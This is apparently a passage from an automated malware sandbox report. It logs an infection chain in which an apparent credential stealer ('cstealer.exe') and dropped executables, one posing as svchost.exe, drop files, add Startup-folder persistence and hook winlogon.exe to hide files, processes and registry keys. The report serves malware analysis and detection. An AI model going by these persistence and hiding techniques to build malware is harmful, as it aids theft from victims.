                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\sqlite3.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\ucrtbase.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_queue.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\libssl-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libssl-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\VCRUNTIME140.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Found hidden mapped module (file has been removed from disk)
                                Source: C:\ProgramData\setup.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
                                Hooks files or directories query functions (used to hide files and directories)
                                Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                                Hooks processes query functions (used to hide processes)
                                Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                                Hooks registry keys query functions (used to hide registry keys)
                                Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Modifies the prolog of user mode functions (user mode inline hooks)
                                Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeCode function: 3_2_00007FF6957E7100 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00007FF6957E7100
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\DevxExecutor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
